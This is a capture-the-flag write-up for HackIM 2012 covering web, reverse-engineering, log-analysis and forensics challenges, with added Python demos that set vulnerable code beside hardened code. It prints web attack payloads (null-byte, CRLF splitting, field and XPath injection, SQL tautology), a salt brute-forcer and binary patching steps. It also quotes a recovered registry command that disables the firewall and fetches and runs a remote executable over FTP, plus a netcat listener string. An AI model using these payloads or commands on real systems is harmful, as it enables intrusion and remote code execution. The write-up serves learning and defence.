Analysis: As the description suggests, it was null byte injection; I had come across a null byte problem in one of the wargames. Let's understand the problem. Our challenge was to read the contents of the file password.asp, which somehow was protected by the server. In the given URL we can observe that the default parameter is test.txt. Multiple questions arise here: why only test.txt as the parameter? If you don't do anything with a parameter, why take one? Looking at it as a real application: we have an application which takes a filename from us, reads it, and shows it to us. We found an example input, "test.txt". We know there is sensitive information in password.asp, but we can't get password.asp. So let's imagine that whoever wrote this application, which reads any file we tell it to, wanted to keep us from reading anything but files which end in ".txt". Any input we give it that doesn't end in ".txt" is rejected. So here's the problem: how do we get a file which ends in ".asp" when the filename we provide has to end in ".txt"?
The answer obviously is the null byte, but that would be a partial answer to the question "HOW?". In languages like ASP and PHP a null byte doesn't end a string; it's just another character. In C and C++, and in the C runtime underneath the operating system's file APIs, a null byte means the end of a string. So if we give a PHP script a filename to open that contains a null byte, the filename is different in PHP and in the OS: it might be "hello%00blah" to PHP, but it would be "hello" to the operating system.
Some applications append a file extension to the end of any filename we give them, so we give them "hello" and they open "hello.txt". That is why we use "hello.php%00": PHP sees "hello.php%00.txt" and the OS sees "hello.php". And after this long, boring, worthless explanation, hence the flag.
Flag: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
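The chosen-password salt recovery of Programming Level 5 as an added Python example (not the writeup's procedure, which used BarsWF). With hash = md5(password + salt) and the password fixed to "1", the search space is only the salt; the example enumerates it with hashlib. The 6-hex-character salt format is taken from the flag above; the target hash is constructed here from a made-up shorter salt so the demo runs in well under a second.

```python
# Added example: recover an unknown salt when the password is chosen by the attacker.
import hashlib
from itertools import product

HEX = "0123456789abcdef"


def salted_md5(password: str, salt: str) -> str:
    """The challenge's construction as the writeup describes it: md5(password + salt)."""
    return hashlib.md5((password + salt).encode()).hexdigest()


def recover_salt(target: str, password: str, salt_len: int, alphabet: str = HEX):
    """Enumerate alphabet**salt_len candidates; return the salt whose hash matches, else None."""
    for combo in product(alphabet, repeat=salt_len):
        salt = "".join(combo)
        if salted_md5(password, salt) == target:
            return salt
    return None


# Constructed demo: a 3-hex-character salt (4096 candidates). The real level's 6-character
# hex salt is 16**6 = 16,777,216 candidates, still trivial for a GPU cracker.
DEMO_SALT = "c18"
DEMO_HASH = salted_md5("1", DEMO_SALT)

if __name__ == "__main__":
    print(recover_salt(DEMO_HASH, "1", len(DEMO_SALT)))
```

The writeup's BarsWF run used "-c 0a" (digits plus lowercase letters), a 36-symbol alphabet over the whole 7-character string "1c183e7"; knowing the password prefix and that the salt is hexadecimal narrows that to the 16-symbol alphabet used here.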
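The PHP-versus-OS view of the filename from Web Level 1, as an added Python example (not the challenge's server code). The vulnerable resolver runs the ".txt" check on the full decoded string and then hands it to an OS path model that, like a C string, stops at the first NUL; the hardened resolver rejects the NUL (and path separators) before the check. The allowed suffix and the hardened rules are assumptions for the demo.

```python
# Added example: null-byte truncation between an extension check and the file open.
from urllib.parse import unquote

ALLOWED_SUFFIX = ".txt"      # assumed policy: only .txt files may be served


def os_sees(path: str) -> str:
    """C-string view of the filename: everything before the first NUL byte."""
    return path.split("\x00", 1)[0]


def vulnerable_resolve(raw_param: str):
    """Suffix check on the decoded parameter, then the OS-level name that would be opened."""
    name = unquote(raw_param)           # "%00" becomes a real NUL character here
    if not name.endswith(ALLOWED_SUFFIX):
        return None                     # rejected by the application
    return os_sees(name)                # what open() would actually receive


def hardened_resolve(raw_param: str):
    """Reject control bytes and separators before any suffix decision."""
    name = unquote(raw_param)
    if "\x00" in name or "/" in name or "\\" in name:
        return None
    if not name.endswith(ALLOWED_SUFFIX):
        return None
    return name


if __name__ == "__main__":
    print(vulnerable_resolve("password.asp%00.txt"))   # password.asp
    print(hardened_resolve("password.asp%00.txt"))     # None
```

Modern PHP, Python and most runtimes now refuse NUL bytes in path arguments themselves, but the pattern (validate one representation, open another) recurs with Unicode normalisation and double URL-encoding, so the fix is still to canonicalise first and validate the exact string that will be opened.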
  • 16. Web Level 2
Official Hint: Judgment of Solomon
Page Source: Nothing interesting
Description: Can you redirect ME to hackim.null.co.in?
Analysis: I had to go through the hint to get this one done. After a few attempts with variations of the parameter, I arbitrarily ended up going through the boring story on Wikipedia. The summary of the story is: "Solomon suggested that the baby be split in half and each half given to one of the women claiming to be the mother". So the hint refers to the word "split". A quick search for "HTTP splitting" returned several results. I studied a few of them, showing various PoCs, and realised that I had spent most of my time injecting into the HTTP response rather than redirecting it: the parameter is echoed into a response header, so an encoded CRLF (%0d%0a) terminates that header and whatever follows it is parsed as new status and header lines. Finally I got the level done with several parameter variations.
Flag: http://www.nullcon.net/challenge/wlevel-2-proc.asp?page=%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in

Web Level 3
Official Hint: Proxies are golden friends
Page Source: <!-- If you're still reading, better register Mate :) -->
Description: Click here to Login || Click here to Register
Analysis: In this level we were entertained with two options, register and login. I clicked on both of them and went through the page source; nothing seemed interesting. I had a thought that it could be vulnerable to some kind of injection. Next I filled in the form and registered. Wow, my registration was successful; I didn't expect that. But on login with those credentials all I got was an error message: "Only ADMINS are Welcome!". I came back to the registration page and tried another input. There I observed the page source, and cool, this time we had something interesting, in this format:
<!--Debug Info: INSERT uname|pass|uname|uname@localhost.com|admin:no|comment:newuser INTO USER DB FILE -->
So it was all here: the parameter with admin:no was passed into the database. Now there was not much to do; next I used Burp Suite to check how the parameters were passed.
  • 17. On the last line of the intercepted request in the Burp window we can observe how the parameters are passed to the server. This format was similar to the one we got in the post-registration page source. So all we had to do was add admin:yes as per the format: the email value is copied into the pipe-delimited record unescaped, so a "|" inside it injects an extra admin:yes field ahead of the server's own admin:no. Even this process annoyed me a lot, since I couldn't get it right in a single attempt. The correct format was:
username=me.admin&name=admin&password=admin&email=admin%40localhost.com|admin:yes&Submit=Register
And finally I registered myself as the admin and got the flag.
Flag: b3149ecea4628efd23d2f86e5a723472
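Web Levels 2 and 3 share one defect, user input copied unescaped into a text format whose structure is carried by delimiter characters (CRLF between HTTP header lines; "|" between fields of the user record). This added Python example (not the challenge's server code) models both as the writeup shows them, replays the two payloads from the flags above, and pairs each with the delimiter check that closes the hole. The response layout, the record parser and the "first admin field wins" rule are assumptions about the server.

```python
# Added example: CRLF injection into a redirect header and '|' injection into a record.
from urllib.parse import unquote

# --- Web Level 2: header injection ------------------------------------------------

def vulnerable_redirect(page_param: str) -> bytes:
    page = unquote(page_param)                 # %0d%0a becomes a real CR LF pair
    return f"HTTP/1.0 302 Found\r\nLocation: {page}\r\n\r\n".encode()


def hardened_redirect(page_param: str) -> bytes:
    page = unquote(page_param)
    if "\r" in page or "\n" in page:           # no line breaks inside a header value
        raise ValueError("CR/LF in header value")
    return f"HTTP/1.0 302 Found\r\nLocation: {page}\r\n\r\n".encode()


def location_headers(raw: bytes):
    """All Location header values a client would see in the response head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    return [line.split(":", 1)[1].strip()
            for line in head.split("\r\n") if line.lower().startswith("location:")]


SPLIT_PAYLOAD = "%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in"

# --- Web Level 3: field injection -------------------------------------------------

def vulnerable_record(username: str, name: str, password: str, email: str) -> str:
    return f"{username}|{password}|{name}|{email}|admin:no|comment:newuser"


def hardened_record(username: str, name: str, password: str, email: str) -> str:
    for value in (username, name, password, email):
        if "|" in value or ":" in value:       # field content must not carry delimiters
            raise ValueError("delimiter in field")
    return f"{username}|{password}|{name}|{email}|admin:no|comment:newuser"


def parse_record(record: str) -> dict:
    """Assumed server behaviour: key:value flags after the 4th field, first occurrence wins."""
    fields = record.split("|")
    flags = {}
    for field in fields[4:]:
        key, _, value = field.partition(":")
        flags.setdefault(key, value)
    return {"username": fields[0], "admin": flags.get("admin")}


INJECTED_EMAIL = "admin@localhost.com|admin:yes"     # the email value from the writeup

if __name__ == "__main__":
    print(location_headers(vulnerable_redirect(SPLIT_PAYLOAD)))
    print(parse_record(vulnerable_record("me.admin", "admin", "admin", INJECTED_EMAIL)))
```

The same encoded request that Burp showed for Level 3 is what a proxy is for here: the browser's form would have percent-encoded the "|", so the raw field had to be edited after the form was submitted.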
  • 18. Web Level 4: Can You Get Me all the Data?
Official Hint: if you think you've seen all the data, I'm afraid you're mistaken
Page Source: Nothing interesting
Description: 2007 && 2002
Analysis: At the beginning of this level I had no idea at all what was really required. After hovering around the links for a few hard hours, I got a cool link on OWASP: https://www.owasp.org/index.php/Interpreter_Injection
There were a few interesting attack vectors which I foolishly tried, in vain. I read the description again and understood it was asking to reveal data from the server, and then realised that I had tried those injection parameters blindly. On my next attempt I went looking for cheat sheets on various attack parameters. I collected a few and studied them; they were beyond my understanding. Helplessly I shouted in the IRC and got some clue, a clue which again required traversing blindly. Eventually I came across an article, http://palpapers.plynt.com/issues/2005Jul/xpath-injection/, which described XPath injection in simple, understandable language, and then a good cheat sheet here: http://www.simple-talk.com/dotnet/.net-framework/xpath,-css,-dom-and-selenium-the-rosetta-stone/
I tried those attack vectors and got the flag unexpectedly with this one: input=] | /* | /foo[bar=
(The "]" closes the application's own predicate, the union operator "|" adds every node selected by "/*", and "/foo[bar=" re-opens a predicate so that the remainder of the original query still parses.) I completed this level blindly, a bad one.
Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear

Web Level 5
Official Hint: It's SQLi
Page Source: Nothing interesting
Description: Do You Have What IT Takes to Break into the World's Most Secure Login System?
Analysis: The very first thing anyone would try after one look at the page is the very common SQL injection (' or 1=1--), and yes, I was on the same side of the coin. As usual I was wrong again. Assuming it to be a blind SQLi, I looked around www.1337day.com and www.exploit-db.com in the hope of finding some good papers. On the very first link on exploit-db I found a paper on advanced blind SQLi; I went through it and it listed some attack vectors against web application firewalls. With positive hope I tried them, and on the second attempt, using <>1 as both the username and the password, I made it to the flag.
Flag: 47c1b025fa18ea96c33fbb6718688c0f
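The tautology the writeup tried first in Web Level 5, as an added Python example (not the challenge's login code): a login built by string concatenation, the same login with bound parameters, and the ' or 1=1-- payload run against both in an in-memory SQLite database. The page does not show the query behind the "<>1" bypass that finally worked, so that variant is not modelled; the table and credentials here are constructed.

```python
# Added example: tautology login bypass against concatenated SQL, and the parameterised fix.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed user table for the demo."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return db


def login_concat(db, username: str, password: str):
    """Vulnerable: user input is spliced into the SQL text."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_param(db, username: str, password: str):
    """Hardened: the driver binds values, so quotes and '--' are just characters."""
    row = db.execute("SELECT username FROM users WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None


TAUTOLOGY = "' or 1=1--"

if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, TAUTOLOGY, "x"))    # admin
    print(login_param(db, TAUTOLOGY, "x"))     # None
```

With concatenation the statement becomes WHERE username='' or 1=1--' AND password='x', and the "--" comments out the password check; a keyword filter that blocks "or 1=1" is only a speed bump, which is what the WAF-bypass paper the writeup found was about.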
  • 19. Reverse Engineering Levels

Reverse Engineering 1: Basic Test
Official Hint: N/A
Page Source: <!-- md5sum: 9d428bdcb07127ff4358f7d487445470 -->
Description: justdoit.exe
Analysis: The given binary seemed suspicious, so before executing it I decided to analyse it and verify that it was safe to run. I loaded the binary into a hex editor and looked at it: the section headers showed that it was UPX packed. I unpacked it using "Universal Extractor" and went through it again; no conclusion. Finally I executed it inside a VM and watched its behaviour. At first I couldn't get anything from it; I executed it a few more times and saw the keyboard automation done by the exe. Then I googled "keyboard automation" and the first result was AutoHotkey. Eventually I ended up looking for Exe2Ahk at http://www.autohotkey.com/download/Exe2Ahk.exe
After successful decompilation, I found the flag in plain text.
Flag: We could talk all day about what AutoHotKey can do for an online poker player

Reverse Engineering 2: Ask nicely, it will give you what you want
Official Hint: Take another path.. in general look for interesting code blocks & execute them.. code can be anywhere in the PE, even in data | Resource? No Resource
Page Source: <!-- md5sum: c786287c7825784a85413695a9e319fc -->
Description: HackIM.exe
Analysis: I consider this the most insane level in the whole CTF. I spent nearly two hacking days getting past it. To understand the binary I downloaded nearly every tool Google returned for the string "PE", went through various articles on reversing PE files and, worst of all, switched between 3 different debuggers one by one. Ultimately, after tracing the flow of the program several times in OllyDbg, the following steps led to the flag:
1. As the hint was suggesting "No Resource", I loaded the PE into Resource Hacker to see what exactly that meant, and encountered an error.
  • 20. So it was clear from this error that there was something wrong with the resource section.
2. I turned to OllyDbg, loaded the PE and went to the memory window (Alt+M).
3. At offset 0040C000 there was the .rsrc (resource) section. I changed the access on the section from Read to Full Access, so that code placed there could be executed.
4. Tried running the program but couldn't get anything desired. Looked at the hint again and there it was, asking to execute the resource section.
5. So now it was time to place a jump instruction somewhere so as to execute the resource section. Came back to the CPU window (Alt+C).
6. Just below the program entry point, at offset 00401273, there was a JMP instruction.
  • 21. 7. So all I had to do was point that jump at the resource section, address 0040C000.
8. And finally, running the program, I got the flag in the message box.
Flag: AreYouHappyNow?
  • 22. Reverse Engineering 3: null Mobile Android App
Official Hint: N/A
Page Source: <!-- md5sum: fd81ba87c0edc1f37250e680a49260d8 -->
Description: We're proud to announce the null Mobile Android App Project; however the application is currently in Beta Phase and requires lots of attention from the testers. In keeping with the spirit of HackIM we've hidden a Flag inside. Your task is to find the Flag.
Analysis: I didn't have as hard a time with this one as with the previous. I unpacked the APK (it is a ZIP archive) with WinRAR and went through the contents. Inside res/raw there were two files, code.js and junk.php. The JavaScript inside code.js was unformatted; I formatted it using http://www.jsbeautifier.org and went through it, but couldn't find anything interesting. Next I opened junk.php in UltraEdit and after careful observation, at line 72, I saw a packed JavaScript function. Finally an online tool at http://www.strictly-software.com/unpacker helped me unpack the JavaScript, revealing the flag inside it.
Flag: Do not let what you cannot do interfere with what you can do.

Reverse Engineering 4
Official Hint: we've updated the binary with hints, request all to download again to proceed
Page Source:
<!-- md5sum: 7c87b2bfe4e02dbb32e2c3067cb93692 -->
<!-- <center><h3><a href="data/script">script</a></h3></center> -->
<!-- md5sum: 849f2d8c6e22604cba8fe4904803de10 -->
Description: REL4 UPDATE: We have updated the binary with some hints inbuilt. Request all to download the new RE binary to proceed.
Analysis: My first step with the given file was to identify its type. I used TrID File Identifier, also available online at http://mark0.net/onlinetrid.aspx. The result showed that it was an ELF binary, so I cross-verified it on the terminal with file:
  • 23. It showed that the binary was stripped. I tried executing it and was entertained with the following error.
I tried the strace and ltrace commands but couldn't learn much from their output.
The error said something about a time machine, so I went to Google and looked for anything interesting on time machines, but couldn't find anything helpful.
The next thing I did was change the system date to some earlier year; I changed it to the year 2000. I tried executing the binary again and, voila, there was no error, but no flag either. I tried giving it some parameters, but that didn't help. Next I opened a new terminal and looked at the currently running processes using the command ps -aux and got a long list. It was difficult to pick anything out, so I filtered it using the command ps -aux | grep script2 and, whoa, unexpectedly got to see a shell script. I went through it, and there was our flag in plaintext.
Flag: Nature has neither kernel nor shell; she is everything at once
Reverse Engineering 5: Got Dumped :(
Official Hint:
Page Source: <! -- md5sum: 043e4cc85c519723fad18dce7502371c -->
Description: lol.rar
Analysis: This challenge was about crash dump analysis. I opened it in a hex editor and, going through the first few lines, got the idea that it was a Windows crash dump. Next I installed WinDbg with proper symbol configuration and loaded the dump into it. I was unfamiliar with this kind of analysis and went through a few links on Google. I got some good information and a few cheat sheets. Ultimately the following steps helped me to understand the dump.
1. First we had to identify the file that caused the crash. The command !analyze -v showed that stub.exe caused the crash.
2. Next we had to extract stub.exe from the dump to analyze it. For this there is SOS, which is used for .NET debugging (to dump DLLs and EXEs).
3. .load clr10sos.dll
4. !sam folder_location
5. Now we had stub.exe. Next I loaded stub.exe into OllyDbg.
I stepped into the instruction and realized that the jump was passing control to the crashing portion of the assembly. I tried to bypass it by jumping to the messagebox function. I got the message box, but there was no flag in it. I went back to WinDbg and checked for the PID, since there was a GetProcessID call in the assembly. I got the PID as 0xA60, then I patched GetProcessID to return 0xA60 and finally got the flag.
  • 24. Flag: TheLastSamurai
Log Analysis
Log Analysis 1: Basic
Official Hint: N/A
Page Source: <! -- md5sum: 1e2612e8ff3d4651c7d5fc67f2797906 -->
Description: report
Analysis: In this challenge the log was not too large, but it took a long time to understand. Every line had a cool piece of information. On carefully observing the lines, I found something very interesting on line number 31:
+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled: /challenge/logically_insane/
I checked it out and found two files, but at the very next moment realized that the game was still on. It said "Ask the proper question to get the proper answer". I went to the page source and got a bit closer to the flag; there was a hint given in a comment:
<!-- askmelater.asp?question=? -->
And to my surprise, with my very first guess, I got the flag. HAPPY!!!
The final URL was: http://nullcon.net/challenge/logically_insane/askmelater.asp?question=flag
Flag: 6bb61e3b7bce0931da574d19d1d82c88
  • 25. Log Analysis 2: Mystery Password
Official Hint: N/A
Page Source: <!-- md5sum: 6eebd22df057377a436dad2d97fad8b6 -->
Description: log3.pcap
Analysis: There wasn't much in this challenge. The log was unexpectedly small, and within a few minutes anyone could solve it. I opened the log in Wireshark. The easiest way to read the log was to look at the TCP stream: right-click on a packet in the log window > Follow TCP Stream, which popped up the TCP stream window. The very last line of the stream content revealed the password, and with the next few attempts I got the flag.
Flag: ..Supp@..adm1n
  • 26. Log Analysis 3: Clever Intruder
Official Hint: N/A
Page Source: <!-- md5sum: 396df3308184a77890cb708f05915f29 -->
Description: access.rar
Analysis: A 25 MB log with approx. 1 lakh (100,000) lines. It seemed nearly impossible to analyze, so I thought for a while and looked around Google for a good log explorer to make the task easier. I got a few, but they were all useless; I wasted my time, came back to my old favourite UltraEdit and gave a quick glance through the lines. I learnt from the logs that:
- Logs were generated from different scanners.
- There was variation in the source IP.
- Scanning was performed on the same date, within a fixed period of uninterrupted time.
- The HTTP status code for most of the requests was 404.
The last finding proved to be essential, assuming we couldn't find anything interesting in a "Page Not Found" error. I tried my level best to separate all those 404 lines out into different tabs in UltraEdit. This was a really hectic job; had I had some more knowledge it wouldn't have been so tough to get past this hurdle. This level really made me realize how poor I am. After long hours of assumed work, I eventually came across a line with the base64-encoded string "bmMgLWwgLXAgNjY2Ng==", which decodes to "nc -l -p 6666". In the original log this was on line number 37409 (UltraEdit).
Flag:
  • 27. Log Analysis 4:
Official Hint: Exploited!!!
Page Source: <!-- md5sum: afcc45de48c327847c507c68ad7e6bf4 Expected Format: CVE-XXXX-XXXX -->
Description: CVE of the Exploit is the Flag
Analysis: This challenge was all about finding the CVE exhibited by the content of the log. As mentioned, it was a Burp Suite log. To make it easier to view, I renamed the log file to log.xml and opened it in a web browser. Again this log had many 404 Not Found requests. After going through the first few lines, I came across the Tikiwiki requests; there were other requests for Joomla, but I preferred to go sequentially. Since I'm not good with exploit identification, I browsed to http://nvd.nist.gov/ and searched for CVEs for Tikiwiki. Most of the results returned CVEs related to XSS, but in our log I couldn't see anything XSS-like, so I went with the exceptions and eventually got the flag. Honestly, I couldn't tell which line in the log referred to the CVE, but I had an answer for the question.
Flag: CVE-2005-1921
Log Analysis 5: Waat Laga Server
Official Hint:
Page Source: <! -- md5sum: c641fa00c0a84fd8fd954b3e75d5d6c8 -->
Description: dump.rar
Analysis: Again 95 MB of logs. I loaded it into Wireshark and tried for a few minutes to look into it, looked at the first few lines and the last few lines, and honestly didn't understand it, as it was really difficult to browse through each line one by one. I tried to find some alternate way and couldn't learn much; all I got was some bogus ads for shareware log explorers asking for $$$. I came back to the description again and noticed that for the 3rd flag a name was required. I googled the string "Local Privilege Escalation Exploit" and the search returned some exploit-db papers. The interesting thing I noticed was a CVE that might help me with author identification. The next challenge was to look for the CVE in such a huge log. I used the cat command, but that didn't help; I tried a few more, but there was no result, and eventually ended up with the strings command to get the CVE:
  • 28. I also found the paper at http://www.exploit-db.com/exploits/9479/. Finally I got my first flag for the challenge: Tavis Ormandy Julien Tinnes. I studied the exploit and understood from the title that it was a local root exploit.
Now expectations were high with the strings command, and I extracted all the strings from the dump to a plain text file. The command I used was: strings dump.pcapng > dump.txt
By this time I had a stripped-down version of the log with the more important things.
Next I tried to look for the last flag, the root password, since it was a local root exploit. I looked for the pattern root inside dump.txt and got the hash for root. Next I used John the Ripper to crack the hash and got my 2nd flag as: zuzana
On to the hunt for the 3rd flag: it asked to look for the vulnerable parameter. I opened dump.txt and saw that there were many 404s, so again it was time to eliminate those and consider the successful responses. I tried a few variations and again stripped down dump.txt to ok.txt; now we had much less information to analyze.
I went through the file ok.txt and noticed that the parameters page, title and id were common to all the GET requests. Hence, with variation of parameters, I got the flag successfully. I had to spend a lot of time with all those iterations and variations; indeed it was one of the levels on which I spent much more time analyzing to get the flag.
Flag:
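Both Log Analysis 3 and Log Analysis 5 come down to the same triage: drop the scanner's 404 noise, then look for anything odd in what remains (a base64 string in Log Analysis 3; the parameters shared by the successful GET requests in Log Analysis 5). Below is an added Python example of that triage, not code from this walkthrough; the log lines are constructed in the Apache combined format and are not from the CTF's access.rar or dump.pcapng, and the base64 string quoted in Log Analysis 3 is embedded in one of them so the decoder has something to find.

```python
import base64
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" format (not from the CTF logs).
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jan/2012:10:15:01 +0530] "GET /admin/ HTTP/1.1" 404 209 "-" "Nikto/2.1.4"
10.0.0.5 - - [26/Jan/2012:10:15:02 +0530] "GET /index.php?page=home&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Jan/2012:10:15:03 +0530] "GET /index.php?page=news&title=abc&id=2 HTTP/1.1" 200 4801 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Jan/2012:10:15:04 +0530] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "-" "w3af"
10.0.0.7 - - [26/Jan/2012:10:15:05 +0530] "GET /index.php?page=bmMgLWwgLXAgNjY2Ng==&id=3 HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

# Fields of a combined-format line up to the response size; the rest is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A run of base64 alphabet characters long enough to be worth trying to decode.
B64_RE = re.compile(r'[A-Za-z0-9+/]{12,}={0,2}')


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["status"] = int(entry["status"])
            entries.append(entry)
    return entries


def successful(entries):
    """Everything that is not a 404: the scanner noise the writeup filtered out."""
    return [e for e in entries if e["status"] != 404]


def decode_base64_candidates(entries):
    """Return (token, decoded) pairs for base64-looking tokens in the request
    target that decode to printable ASCII; anything else is left alone."""
    found = []
    for e in entries:
        for tok in B64_RE.findall(e["target"]):
            try:
                raw = base64.b64decode(tok, validate=True)
            except Exception:
                continue  # wrong length or padding: not base64
            if raw and all(32 <= b < 127 for b in raw):
                found.append((tok, raw.decode("ascii")))
    return found


def parameter_counts(entries):
    """How often each query-string parameter name appears across the requests."""
    counts = Counter()
    for e in entries:
        for name in parse_qs(urlsplit(e["target"]).query, keep_blank_values=True):
            counts[name] += 1
    return counts


if __name__ == "__main__":
    ok = successful(parse_log(SAMPLE_LOG))
    print("non-404 requests:", len(ok))
    print("decoded base64:", decode_base64_candidates(ok))
    print("parameters:", parameter_counts(ok).most_common())
```

The printable-ASCII check is what keeps the decoder from flagging every long alphanumeric path segment: a session id or a hash also matches the base64 alphabet, but it decodes to binary junk rather than a command line.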
  • 29. =====================================================================
Forensics Levels
Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno
Official Hint:
Page Source: <!-- md5sum: 1478ae7166bf5ab5d4f4a4136b819319 -->
Description: While conducting a raid on a suspect the police found the system containing no suspicious information in the form of a code. While comparing various files they came up with a suspicious sound file and feel that the code is hidden inside it. You are asked to find out that code if hidden in the file.
Analysis: This was one of the coolest challenges in the HackIM 2012 CTF. I listened to the audio and observed that there was distortion at certain places, and also heard that the distortion appeared on a single channel. I had earlier used the audio editor software "GoldWave". I opened the audio in GoldWave and separated those distortions from the main stream; since the distortion was on a single channel (right), the task became easier. After listening to the distortion it didn't give up any meaning, so I thought of applying some sound effect, and on the very first attempt, applying the reverse effect, I got the flag.
Flag: 12344346765
Forensics Level 2: Andar Ch0r
Official Hint: A night with MS Office
Page Source: <!-- md5sum: 74a967082a6c79757cf56cb29f70e8d9 -->
Description: Company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the internal codes secretly outside the organization. The company sniffed the data being sent and reconstructed it to find that a Word document was being sent. The company strongly suspects that there is some hidden passport code in the document. You as a forensic investigator are provided with a copy of that file and are required to find out the hidden code. The code has to be a whole number.
Analysis: This challenge was full of twists; I enjoyed solving it. I opened the given Word document and saw some numeric digits; they were hex values, I converted them into ASCII and was made a fool of.
After a while I had doubts about the file and tried to confirm its type using TrID: http://mark0.net/onlinetrid.aspx. The result showed the possibility of the file being an Excel document. I renamed the file to flag.xls and opened it in Excel. Cool, I was on the right path, but now I had no idea what to do. Next I opened the file in Notepad and went through the lines,
  • 30. and somewhere near the end I saw some plain text "Hey Good Job done….." and just below there was "Sheet1" and "Sheet2", but I couldn't remember seeing any Sheet2 in flag.xls. So I got the idea that it was hidden. It had been ages since I had worked on any Excel sheet, so I had really forgotten how to hide Excel sheets. I googled and got a link: http://www.howtogeek.com/howto/14160/hide-and-unhide-worksheets-and-workbooks-in-excel-2007-2010/
So now Sheet2 was visible, but I was still far away from my flag. I again followed the link, where it explained using the VB Editor (ALT+F11) to unhide the "super hidden" worksheet. I saved it, and finally Sheet3 was revealed with the flag in it.
Flag: 6924289
  • 31. Forensics Level 3: Not Guilty!
Official Hint:
Page Source: <!-- md5sum: 66666e32a8296f3073619c1dea43d9bf -->
Description: An employee was suspected of using some malicious files. The employee asserts that he is not guilty because he never used any program except Microsoft Word and Excel. While conducting the analysis nothing was found in the registry suggesting that something ran automatically. All locations that can run programs automatically were examined and nothing malicious was found. You as an investigator are provided with a piece of hive to carve out whether anything was deleted from the hive and provide the exact "Value", "value type" and "data" deleted so that the employee gets justice.
Analysis: This level was all about registry recovery. I had never encountered such an incident, and to understand it went through several forensics articles on registry recovery. Initially I downloaded a Windows binary of a tool called Yet Another Registry Utility (YARU). I played with it for some time and realized that it wouldn't get me anywhere near the flag. I quit and went through a few more manuals. Eventually I came across a tool called "reglookup-recover". It was open source; I installed it on Ubuntu and went through the instructions. After this it wasn't much trouble to get the flag. I came back to the description and cross-checked the values obtained with the result, ending up solving this level.
Flag:
Value: Shell
Value Type: REG_SZ
Data: c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org>cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q
  • 32. Forensics Level 4: Intriguing MBR
Official Hint: Sometimes things spill over
Page Source: <!-- <form id="flevel-4" name="flevel-4" method="post" action="flevel-4-proc.asp" onsubmit="return validate_form(this);"> -->
Description: A suspected drive was found in bad shape. Data extraction was almost impossible and the final copy obtained carried only a few bytes. The bytes belonged to the initial sectors, and wherever the system could not read, the space was filled with 0x00 so as to keep the offsets of the data obtained intact. The initial sector displayed messy MBR data. As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drive
2) The start and end LBA of each partition
3) The start and end of the unpartitioned space between two clusters
The drive showed to be a SATA drive with 512-byte LBAs.
Analysis: Yet another level that kept me away from doing anything else. Merely a 20 KB file, but it may require 20 hours for a newbie like me to understand. I started with Google on partition forensics and ended up at the GUID Partition Table page on Wikipedia; a long story, I'll probably talk about it some other time (Evil Mind). So the first thing we required for this challenge was some boot record parsers. I got one at http://www.garykessler.net/software/index.html. The package contained 5 Perl scripts; I extracted it to a folder.
1. I parsed the GUID Partition Table (GPT) header of the file image.dd using GPTparser.pl
  • 33. Result of parsing:
2. Coming back to Wikipedia, there was a header format for LBA 1:
3. So comparing offsets 072-079 from image.dd with the ones in the table below, we can conclude that there are 9 partitions (2 primary copies as mentioned, and 7 between 72-79).
  • 34. 4. It had also been mentioned in the description that the LBA size was 512 bytes, and in our image.dd we can observe from the parsing result that the partition table starts at offset 80. Hence the next LBA will be at (512+80)=592.
5. Now it was time for some hex editing. I opened image.dd and traversed to position 592 (250h). Since we had concluded in our earlier steps that there were 9 partitions, we had to edit the value at that location from 00 to 09.
6. Now again we had to parse the modified image.dd.
7. As in step 1, and we got all our 9 partitions.
8. The next step was to read the GUIDs from the result and match them against the table given on Wikipedia to find out the partition type.
  • 35. 9. Finally the LBAs thus obtained were not arranged accordingly, and we had to arrange them in ascending order so as to obtain the flag.
Flag:
Forensics Level 5: Universal Swindlers Bayonet
Official Hint:
Page Source: <!-- Format Expected: "DD/MM/YYYY HH:MM:SS" -->
Description: Anusandhaanic Daakus Ltd. is a company whose strength lies in the research it conducts. Very often the employees leaving the organisation manage to carry the research data along with them. This time the company decided to go for an investigation and called upon a forensic investigator. This investigator captured the memory dump and shut the system down. On resuming the system he finds that the drive has been encrypted and is left with only the memory dump. You as an investigator are required to find out the following information from the dump:
1) Serial No. of the external drive
2) Date and time (IST) when the drive was first connected
3) Date and time (IST) when the drive was last connected
4) Launching which other executable (not nullcon.exe) resulted in the launching of nullcon.exe
